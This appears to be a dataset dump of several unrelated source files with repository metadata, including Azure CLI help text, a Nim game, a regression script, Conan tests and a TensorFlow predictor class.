identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """
[ "japhethobalak@gmail.com" ]
japhethobalak@gmail.com
1555377c41913fd09e80066305f590bfe9a837ce
e48f531f7bd40f42ded18e521653feaaca1cea19
/test.py
26b621242fc797d3e04effb2e796351829e73dbc
[]
no_license
konata39/HW3.py
63a655bd8606666b28eef612fe57d7efc4b82ccd
a0569ed39f4642d401286058d74c9a95e4d549f8
refs/heads/master
2020-03-28T07:12:37.397418
2016-06-21T16:44:54
2016-06-21T16:44:54
60,108,859
0
0
null
null
null
null
UTF-8
Python
false
false
428
py
file = open(sys.argv[2], 'r') result = {} found_1 = 0 found_2 = 0 for line in file: spilt_pair = line.split("\twikiPageRedirects\t") spilt_pair[1] = spilt_pair[1].split("\n") if spilt_pair[0] in result.keys(): result[spilt_pair[0]] = result[spilt_pair[0]] + 1 else: result[spilt_pair[0]]=1 if spilt_pair[1][0] in result.keys(): result[spilt_pair[1][0]] = result[spilt_pair[0]] + 1 else: result[spilt_pair[1][0]]=1
[ "noreply@github.com" ]
konata39.noreply@github.com
20ef4d64c7f687955aabb1cd7657f03e26d0dd2a
9f04c2977434c5854e889b424e34593fa9f938d1
/util.py
130285a7131223a594293f1fb1627d28ff4bb93f
[ "MIT" ]
permissive
B10856017/chatbot_telegram_dialogflow
f5ca40d1d5568864c9944ea919fa36707d356523
b33172951c5513b1b60e68a1b5893506a073c397
refs/heads/main
2023-05-04T19:57:51.495156
2021-05-26T04:00:17
2021-05-26T04:00:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
858
py
# https://code.activestate.com/recipes/410692/ # This class provides the functionality we want. You only need to look at # this if you want to know how this works. It only needs to be defined # once, no need to muck around with its internals. class Switch(object): def __init__(self, value): self.value = value self.fall = False def __iter__(self): """Return the match method once, then stop""" try: yield self.match except StopIteration: return def match(self, *args): """Indicate whether or not to enter a case suite""" if self.fall or not args: return True elif self.value in args: # changed for v1.5, see below self.fall = True return True else: return False
[ "noreply@github.com" ]
B10856017.noreply@github.com
6b8ccbd8a85bd0978cc793d7598f0530a85e9cb4
81e11e47150ac47426151af9c7cfb59694f725f2
/jogo nim.py
462bde74e4e7d54a65e55a8e7917be51fd65c0bd
[]
no_license
MCirilo/Estudos
efbce220e5c33a9c11fe211a1dc09d9ad7ad172e
4694f6bac88016daa38cf7ff55f5d5b9ce13ec26
refs/heads/master
2020-06-25T20:21:11.925091
2019-07-29T08:41:37
2019-07-29T08:41:37
199,413,100
0
0
null
null
null
null
UTF-8
Python
false
false
2,645
py
def computador_escolhe_jogada(n, m): computadorRetira = 1 while computadorRetira != m: if (n - computadorRetira) % (m+1) == 0: return computadorRetira else: computadorRetira += 1 return computadorRetira def usuario_escolhe_jogada(n, m): jogadaValida = False while not jogadaValida: jogadorRetira = int(input("Quantas peças deseja tirar? ")) if jogadorRetira > m or jogadorRetira < 1: print("Jogada invalida!") else: jogadaValida = True return jogadorRetira def campeonato(): x = 1 while x <= 3: print() print('partida', x) partida_isolada() print() x += 1 def partida_isolada(): n = int(input("Escolha o numero da de peças: ")) m = int(input("Limite de peças por jogada: ")) computadorEscolhe = True if n % (m+1) == 0: print() print("O computador passou") else: print() print("O computador começa!") computadorEscolhe = True while n > 0: if computadorEscolhe: computadorRetira = computador_escolhe_jogada(n, m) n = n - computadorRetira if computadorRetira == 1: print() print("Computador tirou uma peça") else: print() print("Computador tirou", computadorRetira, "peças") computadorEscolhe = False else: jogadorRetira = usuario_escolhe_jogada(n, m) n = n - jogadorRetira if jogadorRetira == 1: print() print("Usario tirou 1 peça") else: print() print("Usuario tirou", jogadorRetira, "peças") computadorEscolhe = True if n == 1: print("So resta apenas 1 peça") print() else: if n !=0: print("Agora restam,", n, "peças no tabuleiro.") print() print('Fim do jogo! O computador ganhou!') print("Bem vindo ao jogo do NIM! Escolha:") print("1 - Para jogar uma partida isolada ") print("2 - Para jogar um cammpeonato") x = int(input("Escolha o modo: ")) if x == 1: print("Partida isoalda escolhida!") partida_isolada() else: if x == 2: print("Campeonato escolhido!") campeonato()
[ "noreply@github.com" ]
MCirilo.noreply@github.com
96c59b253768c26f43bbf64f7bd1c655facbbaca
a7347bd30b2bfc61ef2272f43dc6a583ca50ea85
/timeline/libs.py
c42effe7d5e3101417501dfbf42f6af42021117f
[ "MIT" ]
permissive
Sergey19940808/blog
cb5a731a5b1af3e3ffe22d03ae554188b573051c
26beea5b218ddfe3347e251994c5c2f500975df0
refs/heads/master
2022-04-11T06:56:05.171087
2020-03-21T13:59:45
2020-03-21T13:59:45
248,254,285
0
0
null
null
null
null
UTF-8
Python
false
false
457
py
class GetSubscribeRecordIdsMixin: def get_subscribes_record_ids(self, subscribes_by_blog): subscribes_record_ids = [] for subscribe_by_blog in subscribes_by_blog: subscribes_record_ids.extend( [ subscribe_record.get('id') for subscribe_record in subscribe_by_blog.subscribes_record.all().values('id') ] ) return subscribes_record_ids
[ "aleksey.serzh@mail.ru" ]
aleksey.serzh@mail.ru
9ce8ba8ed02d447b630541ebffebfeb1900a1f8a
83c62d10899b4e5d7028915a9f727bcdec0f861c
/reports/tests.py
e868d5496f433f94b227b269b675d01567a51c08
[ "Apache-2.0" ]
permissive
meetjitesh/cito_engine
1b70139d762a9540bc40d2544ff4c9884de4eef3
ae63ff1147fa1c536dc2673e873768e5624b40bb
refs/heads/master
2020-12-26T10:45:52.137856
2014-05-18T14:19:38
2014-05-18T14:19:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
618
py
"""Copyright 2014 Cyrus Dasadia Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from django.test import TestCase # Create your tests here.
[ "cyrus@extremeunix.com" ]
cyrus@extremeunix.com
22bb5262bfdf64575926a0fa28d985c7f98f04dd
2f9b7689ef4afebf5f09e6f6ef0865b449482c60
/milestone_1/ridge_10cv_scan_lambda.py
8853d9d3571ae10a74e82ac58712bcaee62d8601
[]
no_license
jlandman/CSE517A-Application-Project
8b07d7e4cf91039ce85bf2c613375a519b2044be
d14c5549a36d44686ef873cef236f9e393f2b8ab
refs/heads/master
2021-05-01T03:19:03.994812
2018-05-07T23:48:23
2018-05-07T23:48:23
121,190,419
2
0
null
null
null
null
UTF-8
Python
false
false
2,379
py
import numpy as np import math from sklearn import linear_model from sklearn.model_selection import KFold import matplotlib.pyplot as plt def cross_val_error(X,Y,lam): insample = 0.0 outsample = 0.0 kf = KFold(10) for train_index, test_index in kf.split(X): Xtr = X[train_index] Ytr = Y[train_index] Xte = X[test_index] Yte = Y[test_index] reg_ridge = linear_model.Ridge(alpha=lam,fit_intercept=True, normalize=True) reg_ridge.fit(Xtr,Ytr) Ytr_pred = reg_ridge.predict(Xtr) Yte_pred = reg_ridge.predict(Xte) resids_tr = (Ytr-Ytr_pred).flatten() resids_te = (Yte-Yte_pred).flatten() insample += np.sqrt(np.sum(np.dot(resids_tr,resids_tr))/Ytr.size) outsample += np.sqrt(np.sum(np.dot(resids_te,resids_te))/Yte.size) insample /= 10.0 outsample /= 10.0 return (insample,outsample) if __name__ == "__main__": with open('../dataset/OnlineNewsPopularity/OnlineNewsPopularity.csv', 'r') as file: input = file.readlines() names = input[0] data = input[1:] data = [line.split(',') for line in data] data = np.array(data) data = data[:,2:].astype(float) np.random.shuffle(data) X = data[:,:-1].astype(float) Y = data[:,-1:].astype(float) Y = np.log(Y) print('Running 10-Fold Cross-Validation, Ridge Regression Model') lnlambdas = np.arange(-15,10,0.1) lambdas = np.exp(lnlambdas) insample = np.zeros_like(lambdas) outsample = np.zeros_like(lambdas) for i, l in enumerate(lambdas): pass insample[i], outsample[i] = cross_val_error(X,Y,l) #print('lambda: %f | in sample error: %.5f | out of sample error: %.5f' % (lambdas[i], insample[i], outsample[i])) min_index = np.argmin(outsample) print('minimum lambda: %f | in sample error: %.5f | out of sample error: %.5f' % (lambdas[min_index], insample[min_index], outsample[min_index])) plt.plot(lnlambdas,insample, 'bo-', label='training error') plt.plot(lnlambdas,outsample, 'ro-', label='cross validation error') plt.suptitle('10-Fold Cross Validated Ridge Regression',fontsize=16) plt.ylabel('Error'); plt.xlabel('ln(lambda)'); plt.legend() #plt.draw() plt.savefig('ridge_lambda.png',dpi=500) print('saved plot to \'ridge_lambda.png\'')
[ "glickzachary@gmail.com" ]
glickzachary@gmail.com
43dc9ca7fee52eea74438ce9d6652081a92314f5
148bb391b6476230b864f070fed1424df50a65ff
/BRG_to_HSV/recognition.py
ee40a11ae3efdb03775f1a407cb245447c592fc3
[]
no_license
parshvas25/OpenCv_Python
9e4a3985cddd9caae18963047d376e905268effc
94de46ada177428b2101e9b09c6cc9466c7a019b
refs/heads/master
2020-05-25T19:58:01.432176
2019-06-21T04:31:55
2019-06-21T04:31:55
187,964,643
2
0
null
null
null
null
UTF-8
Python
false
false
589
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue May 21 11:22:28 2019 @author: parshvashah """ import cv2 import numpy as np from matplotlib import pyplot as plt BGRImage = cv2.imread('turtle.jpg') #plt.imshow(BGRImage) RGBImage = cv2.cvtColor(BGRImage, cv2.COLOR_BGR2RGB) #plt.imshow(RGBImage) hsv_frame = cv2.cvtColor(RGBImage, cv2.COLOR_BGR2HSV) #HSV Color Converstion low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) mask = cv2.inRange(hsv_frame,low_green, high_green) cv2.imshow("Detection", mask ) cv2.waitKey(0) cv2.destroyAllWindows()
[ "noreply@github.com" ]
parshvas25.noreply@github.com
2941a49805c7649c3387fa6627205b414ac1750d
7f1ffa9d929d572ea8fea3477c4341cc138f99e6
/easy_rec/python/inference/predictor.py
9c2248c96c2166035a102c1255ca44d0562aa158
[ "Apache-2.0" ]
permissive
xinghudamowang/EasyRec
004a104a33206e2ba594e5590fb67652837d6c05
5a68c589a6bd6809d6da9b070be63e315ed7ea91
refs/heads/master
2023-08-28T03:53:17.003770
2021-11-11T08:24:11
2021-11-11T08:24:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
18,904
py
# -*- encoding:utf-8 -*- # Copyright (c) Alibaba, Inc. and its affiliates. from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import logging import math import os import time import numpy as np import six import tensorflow as tf from tensorflow.core.protobuf import meta_graph_pb2 from tensorflow.python.saved_model import constants from tensorflow.python.saved_model import signature_constants from easy_rec.python.utils.load_class import get_register_class_meta if tf.__version__ >= '2.0': tf = tf.compat.v1 _PREDICTOR_CLASS_MAP = {} _register_abc_meta = get_register_class_meta( _PREDICTOR_CLASS_MAP, have_abstract_class=True) class PredictorInterface(six.with_metaclass(_register_abc_meta, object)): version = 1 def __init__(self, model_path, model_config=None): """Init tensorflow session and load tf model. Args: model_path: init model from this directory model_config: config string for model to init, in json format """ pass @abc.abstractmethod def predict(self, input_data, batch_size): """Using session run predict a number of samples using batch_size. Args: input_data: a list of numpy array, each array is a sample to be predicted batch_size: batch_size passed by the caller, you can also ignore this param and use a fixed number if you do not want to adjust batch_size in runtime Returns: result: a list of dict, each dict is the prediction result of one sample eg, {"output1": value1, "output2": value2}, the value type can be python int str float, and numpy array """ pass def get_output_type(self): """Get output types of prediction. in this function user should return a type dict, which indicates which type of data should the output of predictor be converted to * type json, data will be serialized to json str * type image, data will be converted to encode image binary and write to oss file, whose name is output_dir/${key}/${input_filename}_${idx}.jpg, where input_filename is extracted from url, key corresponds to the key in the dict of output_type, if the type of data indexed by key is a list, idx is the index of element in list, otherwhile ${idx} will be empty * type video, data will be converted to encode video binary and write to oss file, eg: return { 'image': 'image', 'feature': 'json' } indicating that the image data in the output dict will be save to image file and feature in output dict will be converted to json """ return {} class PredictorImpl(object): def __init__(self, model_path, profiling_file=None): """Impl class for predictor. Args: model_path: saved_model directory or frozenpb file path profiling_file: profiling result file, default None. if not None, predict function will use Timeline to profiling prediction time, and the result json will be saved to profiling_file """ self._inputs_map = {} self._outputs_map = {} self._is_saved_model = False self._profiling_file = profiling_file self._model_path = model_path self._input_names = [] self._build_model() @property def input_names(self): return self._input_names @property def output_names(self): return list(self._outputs_map.keys()) def __del__(self): """Destroy predictor resources.""" self._session.close() def search_pb(self, directory): """Search pb file recursively in model directory. if multiple pb files exist, exception will be raised. Args: directory: model directory. Returns: directory contain pb file """ dir_list = [] for root, dirs, files in tf.gfile.Walk(directory): for f in files: _, ext = os.path.splitext(f) if ext == '.pb': dir_list.append(root) if len(dir_list) == 0: raise ValueError('savedmodel is not found in directory %s' % directory) elif len(dir_list) > 1: raise ValueError('multiple saved model found in directory %s' % directory) return dir_list[0] def _build_model(self): """Load graph from model_path and create session for this graph.""" model_path = self._model_path self._graph = tf.Graph() gpu_options = tf.GPUOptions(allow_growth=True) session_config = tf.ConfigProto( gpu_options=gpu_options, allow_soft_placement=True, log_device_placement=(self._profiling_file is not None)) self._session = tf.Session(config=session_config, graph=self._graph) with self._graph.as_default(): with self._session.as_default(): # load model _, ext = os.path.splitext(model_path) tf.logging.info('loading model from %s' % model_path) if tf.gfile.IsDirectory(model_path): model_path = self.search_pb(model_path) logging.info('model find in %s' % model_path) assert tf.saved_model.loader.maybe_saved_model_directory(model_path), \ 'saved model does not exists in %s' % model_path self._is_saved_model = True meta_graph_def = tf.saved_model.loader.load( self._session, [tf.saved_model.tag_constants.SERVING], model_path) # parse signature signature_def = meta_graph_def.signature_def[ signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY] inputs = signature_def.inputs # each input_info is a tuple of input_id, name, data_type input_info = [] if len(inputs.items()) > 1: for gid, item in enumerate(inputs.items()): name, tensor = item logging.info('Load input binding: %s -> %s' % (name, tensor.name)) input_name = tensor.name input_name, _ = input_name.split(':') try: input_id = input_name.split('_')[-1] input_id = int(input_id) except Exception: # support for models that are not exported by easy_rec # in which case, the order of inputs may not be the # same as they are defined, thereforce, list input # could not be supported, only dict input could be supported logging.warning( 'could not determine input_id from input_name: %s' % input_name) input_id = gid input_info.append((input_id, name, tensor.dtype)) self._inputs_map[name] = self._graph.get_tensor_by_name( tensor.name) else: # only one input, all features concatenate together for name, tensor in inputs.items(): logging.info('Load input binding: %s -> %s' % (name, tensor.name)) input_info.append((0, name, tensor.dtype)) self._inputs_map[name] = self._graph.get_tensor_by_name( tensor.name) # sort inputs by input_ids so as to match the order of csv data input_info.sort(key=lambda t: t[0]) self._input_names = [t[1] for t in input_info] outputs = signature_def.outputs for name, tensor in outputs.items(): logging.info('Load output binding: %s -> %s' % (name, tensor.name)) self._outputs_map[name] = self._graph.get_tensor_by_name( tensor.name) # get assets self._assets = {} asset_files = tf.get_collection(constants.ASSETS_KEY) for any_proto in asset_files: asset_file = meta_graph_pb2.AssetFileDef() any_proto.Unpack(asset_file) type_name = asset_file.tensor_info.name.split(':')[0] asset_path = os.path.join(model_path, constants.ASSETS_DIRECTORY, asset_file.filename) assert tf.gfile.Exists( asset_path), '%s is missing in saved model' % asset_path self._assets[type_name] = asset_path logging.info(self._assets) # get export config self._export_config = {} # export_config_collection = tf.get_collection(fields.EVGraphKeys.export_config) # if len(export_config_collection) > 0: # self._export_config = json.loads(export_config_collection[0]) # logging.info('load export config info %s' % export_config_collection[0]) else: raise ValueError('currently only savedmodel is supported') def predict(self, input_data_dict, output_names=None): """Predict input data with loaded model. Args: input_data_dict: a dict containing all input data, key is the input name, value is the corresponding value output_names: if not None, will fetch certain outputs, if set None, will return all the output info according to the output info in model signature Return: a dict of outputs, key is the output name, value is the corresponding value """ feed_dict = {} for input_name, tensor in six.iteritems(self._inputs_map): assert input_name in input_data_dict, 'input data %s is missing' % input_name tensor_shape = tensor.get_shape().as_list() input_shape = input_data_dict[input_name].shape assert tensor_shape[0] is None or (tensor_shape[0] == input_shape[0]), \ 'input %s batchsize %d is not the same as the exported batch_size %d' % \ (input_name, input_shape[0], tensor_shape[0]) feed_dict[tensor] = input_data_dict[input_name] fetch_dict = {} if output_names is not None: for output_name in output_names: assert output_name in self._outputs_map, \ 'invalid output name %s' % output_name fetch_dict[output_name] = self._outputs_map[output_name] else: fetch_dict = self._outputs_map with self._graph.as_default(): with self._session.as_default(): if self._profiling_file is None: return self._session.run(fetch_dict, feed_dict) else: run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE) run_metadata = tf.RunMetadata() results = self._session.run( fetch_dict, feed_dict, options=run_options, run_metadata=run_metadata) # Create the Timeline object, and write it to a json from tensorflow.python.client import timeline tl = timeline.Timeline(run_metadata.step_stats) ctf = tl.generate_chrome_trace_format() with tf.gfile.GFile(self._profiling_file, 'w') as f: f.write(ctf) return results class Predictor(PredictorInterface): def __init__(self, model_path, profiling_file=None): """Initialize a `Predictor`. Args: model_path: saved_model directory or frozenpb file path profiling_file: profiling result file, default None. if not None, predict function will use Timeline to profiling prediction time, and the result json will be saved to profiling_file """ self._predictor_impl = PredictorImpl(model_path, profiling_file) self._inputs_map = self._predictor_impl._inputs_map self._outputs_map = self._predictor_impl._outputs_map self._profiling_file = profiling_file self._export_config = self._predictor_impl._export_config @property def input_names(self): """Input names of the model. Returns: a list, which conaining the name of input nodes available in model """ return list(self._inputs_map.keys()) @property def output_names(self): """Output names of the model. Returns: a list, which conaining the name of outputs nodes available in model """ return list(self._outputs_map.keys()) def predict_table(self, input_table, output_table, all_cols, all_col_types, selected_cols, reserved_cols, output_cols=None, batch_size=1024, slice_id=0, slice_num=1): """Predict table input with loaded model. Args: input_table: table to read output_table: table to write all_cols: union of columns all_col_types: data types of the columns selected_cols: columns need by the model, must be the same as pipeline.config reserved_cols: columns to be copied to output_table batch_size: predict batch size slice_id: when multiple workers write the same table, each worker should be assigned different slice_id, which is usually slice_id slice_num: table slice number selected_cols: included column names, comma separated, such as "a,b,c" reserved_cols: columns to be copy to output_table, comma separated, such as "a,b" output_cols: output columns, comma separated, such as "y float, embedding string", the output names[y, embedding] must be in saved_model output_names """ def _get_defaults(col_type): defaults = {'string': '', 'double': 0.0, 'bigint': 0} assert col_type in defaults, 'invalid col_type: %s' % col_type return defaults[col_type] all_cols = [x.strip() for x in all_cols.split(',') if x != ''] all_col_types = [x.strip() for x in all_col_types.split(',') if x != ''] selected_cols = [x.strip() for x in selected_cols.split(',') if x != ''] reserved_cols = [x.strip() for x in reserved_cols.split(',') if x != ''] if output_cols is None: output_cols = self._predictor_impl.output_names else: # specified as score float,embedding string tmp_cols = [] for x in output_cols.split(','): if x.strip() == '': continue tmp_keys = x.split(' ') tmp_cols.append(tmp_keys[0].strip()) output_cols = tmp_cols record_defaults = [_get_defaults(x) for x in all_col_types] with tf.Graph().as_default(), tf.Session() as sess: input_table = input_table.split(',') dataset = tf.data.TableRecordDataset([input_table], record_defaults=record_defaults, slice_id=slice_id, slice_count=slice_num, selected_cols=','.join(all_cols)) logging.info('batch_size = %d' % batch_size) dataset = dataset.batch(batch_size) dataset = dataset.prefetch(buffer_size=64) def _parse_table(*fields): fields = list(fields) field_dict = {all_cols[i]: fields[i] for i in range(len(fields))} return field_dict dataset = dataset.map(_parse_table, num_parallel_calls=8) iterator = dataset.make_one_shot_iterator() all_dict = iterator.get_next() import common_io table_writer = common_io.table.TableWriter( output_table, slice_id=slice_id) input_names = self._predictor_impl.input_names progress = 0 sum_t0, sum_t1, sum_t2 = 0, 0, 0 while True: try: ts0 = time.time() all_vals = sess.run(all_dict) ts1 = time.time() input_vals = {k: all_vals[k] for k in input_names} outputs = self._predictor_impl.predict(input_vals, output_cols) ts2 = time.time() reserve_vals = [all_vals[k] for k in reserved_cols ] + [outputs[x] for x in output_cols] indices = list(range(0, len(reserve_vals))) outputs = [x for x in zip(*reserve_vals)] table_writer.write(outputs, indices, allow_type_cast=False) ts3 = time.time() progress += 1 sum_t0 += (ts1 - ts0) sum_t1 += (ts2 - ts1) sum_t2 += (ts3 - ts2) except tf.python_io.OutOfRangeException: break except tf.errors.OutOfRangeError: break if progress % 100 == 0: logging.info('progress: batch_num=%d sample_num=%d' % (progress, progress * batch_size)) logging.info('time_stats: read: %.2f predict: %.2f write: %.2f' % (sum_t0, sum_t1, sum_t2)) logging.info('Final_time_stats: read: %.2f predict: %.2f write: %.2f' % (sum_t0, sum_t1, sum_t2)) table_writer.close() logging.info('predict %s done.' % input_table) def predict(self, input_data_dict_list, output_names=None, batch_size=1): """Predict input data with loaded model. Args: input_data_dict_list: list of dict output_names: if not None, will fetch certain outputs, if set None, will batch_size: batch_size used to predict, -1 indicates to use the real batch_size Return: a list of dict, each dict contain a key-value pair for output_name, output_value """ num_example = len(input_data_dict_list) assert num_example > 0, 'input data should not be an empty list' assert isinstance(input_data_dict_list[0], dict) or \ isinstance(input_data_dict_list[0], list) or \ isinstance(input_data_dict_list[0], str), 'input is not a list or dict or str' if batch_size > 0: num_batches = int(math.ceil(float(num_example) / batch_size)) else: num_batches = 1 batch_size = len(input_data_dict_list) outputs_list = [] for batch_idx in range(num_batches): batch_data_list = input_data_dict_list[batch_idx * batch_size:(batch_idx + 1) * batch_size] feed_dict = self.batch(batch_data_list) outputs = self._predictor_impl.predict(feed_dict, output_names) for idx in range(len(batch_data_list)): single_result = {} for key, batch_value in six.iteritems(outputs): single_result[key] = batch_value[idx] outputs_list.append(single_result) return outputs_list def batch(self, data_list): """Batching the data.""" batch_input = {key: [] for key in self._predictor_impl.input_names} for data in data_list: if isinstance(data, dict): for key in data: batch_input[key].append(data[key]) elif isinstance(data, list): assert len(self._predictor_impl.input_names) == len(data), \ 'input fields number incorrect, should be %d, but %d' \ % (len(self._predictor_impl.input_names), len(data)) for key, v in zip(self._predictor_impl.input_names, data): if key != '': batch_input[key].append(v) elif isinstance(data, str): batch_input[self._predictor_impl.input_names[0]].append(data) for key in batch_input: batch_input[key] = np.array(batch_input[key]) return batch_input
[ "chengmengli06@qq.com" ]
chengmengli06@qq.com
df1199ce98947f77019b2fc3ee51342bf6b3f2a9
b5aedecd9c928f39ded89b0a7f209e75cf326a89
/while loop.py
476a566393fcf3d1fd272659a93d790c2f949038
[]
no_license
Aneesawan34/Assignments
f945e0e5e413e4812e64bb719eee019e0f409219
d57d59bdd74da67e2e20eab703e63a05fe245484
refs/heads/master
2021-09-08T00:57:36.587495
2018-03-04T21:29:04
2018-03-04T21:29:04
112,734,643
2
0
null
null
null
null
UTF-8
Python
false
false
131
py
current_value = 1 my_name=" anees" while current_value <= 5: print(str(current_value) + my_name.title()) current_value += 1
[ "aneesawan34@yahoo.com" ]
aneesawan34@yahoo.com
64217402f5ba7531d6d16c011e9923000e824b9a
919e74f05976d9ea5f28d5dcf0a3e9311a4d22b2
/conans/test/integration/cache/test_home_special_char.py
9c8ad39a70060a614aa24ffe500e1e6c0b312817
[ "MIT" ]
permissive
thorsten-klein/conan
1801b021a66a89fc7d83e32100a6a44e98d4e567
7cf8f384b00ba5842886e39b2039963fc939b00e
refs/heads/develop
2023-09-01T12:04:28.975538
2023-07-26T10:55:02
2023-07-26T10:55:02
150,574,910
0
0
MIT
2023-08-22T14:45:06
2018-09-27T11:16:48
Python
UTF-8
Python
false
false
2,319
py
import os import platform import pytest from conans.test.utils.test_files import temp_folder from conans.test.utils.tools import TestClient import textwrap _path_chars = "päthñç$" @pytest.fixture(scope="module") def client_with_special_chars(): """ the path with special characters is creating a conanbuild.bat that fails """ cache_folder = os.path.join(temp_folder(), _path_chars) current_folder = os.path.join(temp_folder(), _path_chars) c = TestClient(cache_folder, current_folder) tool = textwrap.dedent(r""" import os from conan import ConanFile from conan.tools.files import save, chdir class Pkg(ConanFile): name = "mytool" version = "1.0" def package(self): with chdir(self, self.package_folder): echo = "@echo off\necho MYTOOL WORKS!!" save(self, "bin/mytool.bat", echo) save(self, "bin/mytool.sh", echo) os.chmod("bin/mytool.sh", 0o777) """) c.save({"conanfile.py": tool}) c.run("create .") conan_file = textwrap.dedent(""" import platform from conan import ConanFile class App(ConanFile): name="failure" version="0.1" settings = 'os', 'arch', 'compiler', 'build_type' generators = "VirtualBuildEnv" tool_requires = "mytool/1.0" apply_env = False # SUPER IMPORTANT, DO NOT REMOVE def build(self): mycmd = "mytool.bat" if platform.system() == "Windows" else "mytool.sh" self.run(mycmd) """) c.save({"conanfile.py": conan_file}) return c def test_reuse_buildenv(client_with_special_chars): c = client_with_special_chars # Need the 2 profile to work correctly buildenv c.run("create . -s:b build_type=Release") assert _path_chars in c.out assert "MYTOOL WORKS!!" in c.out @pytest.mark.skipif(platform.system() != "Windows", reason="powershell only win") def test_reuse_buildenv_powershell(client_with_special_chars): c = client_with_special_chars c.run("create . -s:b build_type=Release -c tools.env.virtualenv:powershell=True") assert _path_chars in c.out assert "MYTOOL WORKS!!" in c.out
[ "noreply@github.com" ]
thorsten-klein.noreply@github.com
8213be913811367f84c82f598abfd0d655db5a67
16c1964238da72cfd8ed4771e3f0007d5d5dfbc9
/workers/urls.py
5f3ac1a365cb20dd27c4c209cd0650d751d4ee03
[]
no_license
fatima2030/mraseel
6dea6a4a4089bdac50d6045ec8ddf09b20bb6064
739c8e4d291eef29c7a5af5c53425f9a66de4c4b
refs/heads/master
2023-02-01T20:27:03.417628
2020-12-19T21:15:41
2020-12-19T21:15:41
322,831,871
2
0
null
null
null
null
UTF-8
Python
false
false
522
py
